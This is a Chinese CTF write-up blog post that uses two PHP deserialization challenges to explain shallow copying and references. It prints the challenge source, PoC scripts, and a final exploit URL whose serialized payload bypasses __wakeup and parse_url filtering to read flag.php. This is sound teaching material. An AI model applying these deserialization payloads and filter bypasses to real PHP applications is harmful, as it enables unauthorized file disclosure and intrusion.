从两道题目浅谈PHP深浅拷贝

最新推荐文章于 2023-02-17 12:45:01 发布
最新推荐文章于 2023-02-17 12:45:01 发布
阅读量563 收藏 1
点赞数 1
分类专栏: CTF知识点总结 文章标签: php 代码规范 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crisprx/article/details/104457047
版权

从两道题目浅谈PHP深浅拷贝

0x01 前言

最近才认认真真看完PHP,虽然还是有很多地方不会应用,因此想多看看有关PHP的题目,看到了两道和PHP深浅拷贝有关的题目,自己也把它搞懂吧。。

0x01 正文

题一:南邮ctf的PHP反序列化

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>

题目意图很简单,就是先设置了对象的一个属性的值,如果另一个属性的值和这个设置好的值相等,则得到flag,而get_magic_quotes_gpc()$pass=stripslashes($pass)只是把加上的转义字符又给去掉,似乎对这个题没有什么影响。最初我以为$o->secret = "*"就是把这个属性的值设为*,其实是设置成了任意字符,那我们如何将这个满足$o->secret === $o->enter这里就要用到PHP深浅拷贝的知识。

我们举一个栗子:

<?php
class Example1
{
    public $name;

    public function __construct($name)
    {
        $this->name = $name;
    }
}

$ex1 = new Example('test1');// $ex1->name现在是:test1
$ex2 = $ex1;// $ex2->name现在是:test1

$ex2->name = 'test2';// 这样修改一下之后,$ex1->name与$ex2->name都变为了:test2

现在我们应该可以理解对象间引用的概念,他们就相当于是同一个类的同一个对象,PHP5默认通过引用传递对象,假设$obj1和$obj2是两个对象,使用$obj1=$obj2这样的方法复制出的对象是相互关联的,程序中想复制一个值与原来相同的对象,而不希望目标对象与源对象关联,应使用clone关键字。

$ex1 = new Example('test1');// $ex1->name现在是:test1
$ex2 = clone $ex1;//$ex2->name现在是:test1
$ex2->name = 'test2';//现在$ex1->name还是test1,而$ex2->name是test2

这里看到,通过clone之后,$ex1与$ex2是两个不同的对象,他们拥有各自的变量环境。但是这里需要注意,在这两个对象内部,拥有的是值类型的数据,如果是内部拥有的是引用类型,那么通过clone得到的新对象中的引用则仍然指向原引用

因此这里就引申出 浅复制深复制 的概念:

浅复制: 使用clone来复制对象,这种复制叫做“浅复制“,被赋值对象的所有变量都还有与原来对象相同的值,而所有的对其他对象的引用都仍然指向原来的对象。
深复制:被复制的对象的所有的变量都含有与原来的对象相同的值,除去那些引用其他对象的变量。

而如果要进行深复制,应该在类中定义一个__clone()方法,在这个方法中完成对目标对象的属性赋以新值,这里就不过多赘述。

或者利用串行化(冷藏与解冻),即序列化再反序列化:

$tmp = serialize($ex1);
$ex2 = unserialize($tmp);

这样得到的$ex2就是一个全新的对象

最后要引出&,属于浅拷贝,举个例子就能明白了:

<?php
$a = 'crispr';
$b = &$a;
$b = 'crispr copy';
echo $a; //此时$a = 'crispr copy'

类似传地址过去,其实它们的改变是完全同步的,或者说它们就是一体的。

因此PHP生成的POC如下:

<?php 
  class just4fun
  {
      var $enter;
      var $secret;
      
      function __construct()
      {
          $this->enter=&$this->secret; //浅拷贝,它们的变化完全同步
      }
   }
 echo serialize(new just4fun());
 
  ?>

题二: 2019全国信息安全大赛 JustSoSo
这里我是本地进行复现的,23333,只能分析一下PHP了和构造Poc,其他的文件包含读PHP就省去了。。。

hint.php

<?php  
class Handle{ 
    private $handle;  
    public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
public function __construct($handle) { 
        $this->handle = $handle; 
    } 
public function __destruct(){
$this->handle->getFlag();
}
}

class Flag{
    public $file;
    public $token;
    public $token_flag;

    function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
    }

public function getFlag(){
$this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true); 
            }  
        }
    }
}
?>

index.php

<html>
<?php
error_reporting(0); 
$file = $_GET["file"]; 
$payload = $_GET["payload"];
if(!isset($file)){
echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
die('hack attacked!!!');
}
@include($file);
if(isset($payload)){  
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/flag/",$value)) { 
         die('stop hacking!');
         exit();
        }
    }
    $payload = unserialize($payload);
}else{ 
   echo "Missing parameters"; 
} 
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->

</html>

通过GET获取两个参数:filepayload
Hint.php中有两个类FlagHandle。主要是通过Handle来调用Flag的getFlag()函数。但在Handle中存在wakeup()函数,该函数会重置所有变量,导致传入的Flag类对象为空。这里可以利用增加对象个数的方式来绕过wakeup函数,增加对象个数时wakeup函数便会失效,这个是比较常见的。还要绕过一层:

 function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
    }

public function getFlag(){
$this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true); 
            }

这里我们的$fileflag.php,而初始化后,$this->token_flag = $this->token,接着调用getFlag()方法后,重新设置了$this->token_flag,因此在这里也应该是要使用&符号,令$this->token_flag = &$this->token进行浅拷贝。

if(isset($payload)){  
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/flag/",$value)) { 
         die('stop hacking!');
         exit();

此时还需要绕过?payload=不能出现flag,但是flag在flag.php中,在url多加斜杠即可,///index.php?此时PHP便不会解析成功了。
最终PHP的Poc如下:

<?php
class Handle{ 
    private $handle;  
    public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
public function __construct($handle) { 
        $this->handle = $handle; 
    } 
public function __destruct(){
	$this->handle->getFlag();
}
}
class Flag{
	public $file;
    public $token;
    public $token_flag;

    function __construct($file){
$this->file = $file;
$this->token_flag = &$this->token;
}
}
	
$o = new Flag('flag.php');
$oo = new Handle($o);
$ser = serialize($oo);

print $ser;
?>

最终payload:
///index.php?file=hint.php&payload=O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";N;s:10:"token_flag";R:4;}}

注意Handle有私有变量,应该加上%00

参考链接:
https://www.cnblogs.com/nul1/p/9418080.html
http://www.lin2zhen.top/index.php/archives/11/

Crispr-bupt
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php5对象复制、clone、浅复制与复制实例详解
10-16
主要介绍了php5对象复制、clone、浅复制与复制,结合实例形式详细分析了php5对象复制、clone、浅复制与复制相关概念、原理、使用技巧与操作注意事项,需要的朋友可以参考下
php浅拷贝,JavaScript 中的浅拷贝
weixin_42398171的博客
03-19 63
工作中经常会遇到需要复制 JavaScript 数据的时候,遇到 bug 时实在令人头疼;面试中也经常会被问到如何实现一个数据的浅拷贝,但是你对其中的原理清晰吗?一起来看一下吧!一、为什么会有浅拷贝想要更加透彻的理解为什么 JavaScript 会有浅拷贝,需要先了解下 JavaScript 的数据类型有哪些,一般分为基本类型(Number、String、Null、Undefined、Boo...
php浅拷贝,PHP中的浅拷贝拷贝
weixin_35710005的博客
03-19 236
PHP中提供了一种对象复制的操作,clone。语法颇为简单:$a = clone $b;这时候就得到a对象就复制了b对象。如果b对象中的成员都是值类型,那也就没什么关系,a对象中的成员和b变量中的成员都是各自占用独立的内存空间。但是由于这个克隆操作是浅拷贝,所以如果b的成员中有引用类型的数据,那么a对象的成员并未真正复制该成员,而是和b对象的成员共享了这一个对象。看下面的示例。...
php中的拷贝和浅拷贝
weixin_42475906的博客
02-17 435
由于对象的赋值时引用,要想实现值复制,php提供了clone函数来实现复制对象,但是clone函数存在这么一个问题,克隆对象时,原对象的普通属性能值复制,但是源对象的对象属性赋值时还是引用赋值,浅拷贝。在PHP中, = 赋值时,普通类型都是拷贝,但是对象类型是浅拷贝,也就是说对象赋值是引用赋值,对象作为参数传递时,也是引用传递,无论函数定义时参数前面是否有&符号。浅拷贝:赋值时是引用赋值,相当于取了一个别名,对其中一个进行修改,另一个也会改变。
浅谈Python浅拷贝拷贝及引用机制
12-24
先简单描述下碰到的题目,要求是写出2个print的结果 可以看到,a指向了一个列表list对象,在Python中,这样的赋值语句,其实内部含义是指a指向这个list所在内存地址,可以看作类似指针的概念。 而b,注意,他是把a...
前端拷贝浅拷贝的问题
01-20
在前端开发中,拷贝和浅拷贝是两个重要的概念,它们关乎到对象和数组复制的机制。当需要创建一个原始对象或数组的副本,而不希望改变原始数据时,就需要考虑这两种拷贝方式。 首先,浅拷贝是创建一个新对象,这个...
浅谈php://filter的妙用
01-02
本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,没想到被三个白帽的一题抢先用了,我也就只好提前分享一下。 XXE中的使用 php://filter之前最常出镜的地方是XXE。由于XXE漏洞的特殊性,我们在读取HTML、PHP...
浅谈校内构建移动电源的租赁-论文
05-21
浅谈校内构建移动电源的租赁
两道ACM题目
12-01
ACM题目,有挑战性:一、Humidex 二、Description
PHP拷贝和浅拷贝
qq_35923199的博客
09-14 190
PHP在把对象赋值给另一个变量的时候,会出现浅拷贝,即引用赋值 避免的方法有三个 改写对象的__clone 方法,并在赋值时,写上clone 函数 使用序列化serialize和反序列化unserialize 使用json_encode和json_decode ...
PHP 对象的拷贝与浅拷贝
qq_25389445的博客
10-27 632
先说一下拷贝和浅拷贝通俗理解 拷贝:赋值时值完全复制,完全的copy,对其中一个作出改变,不会影响另一个 浅拷贝:赋值时,引用赋值,相当于取了一个别名。对其中一个修改,会影响另一个 PHP中, = 赋值时,普通对象是拷贝,但对对象来说,是浅拷贝。也就是说,对象的赋值是引用赋值。(对象作为参数传递时,也是引用传递,无论函数定义时参数前面是否有&符号)
Php拷贝和浅拷贝,浅拷贝拷贝(示例代码)
weixin_34790851的博客
04-10 512
一、数据类型数据分为基本数据类型(String, Number, boolean, Null, Undefined,Symbol)和对象数据类型。基本数据类型的特点:直接存储在栈(stack)中的数据对象数据类型的特点:存储的是该对象在栈中引用,真实的数据存放在堆内存里二、浅拷贝拷贝拷贝和浅拷贝是只针对Object和Array这样的对象数据类型的。拷贝和浅拷贝的示意图大致如下:浅拷贝只复制...
php 浅复制与复制
老干瞄的博客
08-15 364
PHP5起,new运算符自动返回一个引用,一个 对象变量 已经不再保存整个对象的值,只是保存一个标识符来访问真正的对象内容。当对象作为参数传递,作为结果返回,或者赋值给另外一个变量,另外一个变量跟原来的不是引用的关系,只是他们都保存着同一个标识符的拷贝,这个标识符指向同一个对象的真正内容。项目中 为一个变量赋值一个对象时 后续对象改变时会同时改变赋值的对象浅复制:使用clone来复制对象,这种复制
南邮PHP反序列化
weixin_30672019的博客
08-04 239
题目如下: <?php class just4fun { var $enter; var $secret; } if (isset($_GET['pass'])) { $pass = $_GET['pass']; if(get_magic_quotes_gpc()){ $pass=stripslashes...
NCTF 南京邮电大学网络攻防训练平台 WriteUp
热门推荐
4ct10n
08-02 8万+
NCTF 南京邮电大学网络攻防训练平台 WriteUp不说什么直接上题解WEB1.签到题(50)直接查看网页源码 Flag:nctf{flag_admiaanaaaaaaaaaaa}2.md5 collision(50)源码如下:<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ i
南邮CTF web题目总结
超人学飞的日子
06-02 1万+
这几天写了南邮的web题目,都比较基础,但是对我这个小白来说还是收获蛮大的。可以借此总结一下web题的类型一,信息都藏在哪作为ctf题目,肯定是要有些提示的,这些提示有时会在题目介绍里说有时也会隐藏在某些地方。1,源代码,这是最最最常见的。2,http head头中,这个一般都会提下 ‘头’ 什么的。3,非常规提示,就比如这个:如果第一次做ctf题目,不知道还有这些套路,一般不会往这个方面想。二,...
南邮ctf(web wp)
Xi4or0uji
08-20 3473
签到 源代码就有了 md5 collision 传一个字符串,值跟QNKCDZO一样但是又不是它的就行了 签到2 改了本地的maxlength就能输进去zhimakaimen然后拿到flag了 这题不是WEB 把图片下载下来丢去010editor就能看到flag了 层层递进 点进去一直找,找到一个404.html就能看到了,真的藏得很 单身二十年 页面很快就跳转,抓...
每日CTF week1
苟有恒,必有三更眠,五更起。
03-11 2353
2018.3.5 NCTF-变量覆盖 原题链接: http://ctf.nuptsast.com/challenges#%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96 分析: 看源码: &lt;?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?&gt; ...
python100道经典题目
最新发布
01-18
Python100道经典题目是一套经典的Python编程题目集合,旨在帮助初学Python编程的人提高编程能力和理解Python语言的基本知识。这套题目涵盖了Python的各个方面,包括基础语法、数据类型、条件和循环语句、函数、面向对象编程、异常处理等。 这套题目的目的是通过实际的编程练习,让学习者们巩固和应用他们在学习过程中所掌握的知识,提高他们的编码能力和解决问题的能力。 这套题目的难度层次适中,适合初学者学习和练习。对于有一定Python编程经验的人来说,这套题目也可以用来巩固和扩展自己的知识。 在解答这套题目的过程中,学习者可以通过分析问题、思考解决方法、编写代码来提高自己的逻辑思维能力和动手实践能力。在实践的过程中,学习者还可以遇到各种问题和困难,通过解决问题来提高自己的解决问题的能力。 总之,Python100道经典题目是一套非常有价值的Python编程题目集合,可以帮助初学者提高编程能力和理解Python语言的基本知识,也可以作为有一定Python编程经验者的巩固和扩展自己知识的练习题目

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值